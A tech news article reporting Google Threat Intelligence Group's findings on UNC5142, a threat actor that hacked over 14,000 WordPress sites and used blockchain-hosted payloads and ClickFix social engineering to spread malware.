- UNC5142 hacked more than 14,000 WordPress sites to distribute malware
- Malware payloads were obtained from the blockchain, increasing resilience and hampering takedowns.
- ClickFix tricks users into executing malicious commands
More than 14,000 WordPress websites were hacked and used as launch pads for malware distribution, Google’s Threat Intelligence Group (GTIG) said in a recent report.
Discussing the campaign in depth, GTIG said that it is the work of UNC5142, a relatively new threat actor that emerged in late 2023 and stopped operations in late July 2025.
It is not yet known if the pause is temporary, permanent or if the group simply switched to using different techniques. Given its previous success compromising websites and deploying malware, Google believes the group has just improved its obfuscation techniques and is still operating in the wild.
Blockchain and ClickFix
In the campaign, UNC5142 would “indiscriminately” target vulnerable WordPress sites (those with faulty plugins, theme files, and, in some cases, the WordPress database itself).
These sites would receive a multi-stage JavaScript downloader called CLEARSHOT, which allowed malware to be distributed. This downloader obtained the payload from stage two of the public blockchain, often using the BNB chain.
The researchers found that the use of blockchain is interesting as it improves resilience and makes takedowns more difficult:
“The use of blockchain technology for much of UNC5142’s infrastructure and operation increases its resilience in the face of detection and removal efforts,” the report says.
“Network-based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic given the lack of use of traditional URLs. Seizure and deletion operations are also hampered given the immutability of the blockchain.”
From the public blockchain, the malware would scrape a CLEARSHORT home page from an external server. This landing page would serve ClickFix’s social engineering tactic: asking users to copy and paste a command into the Run program on Windows (or the Terminal app on a Mac), which ultimately downloads the malware.
The landing pages were said to typically be hosted on a Cloudflare .dev page and retrieved in an encrypted format.
Through Hacker News
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
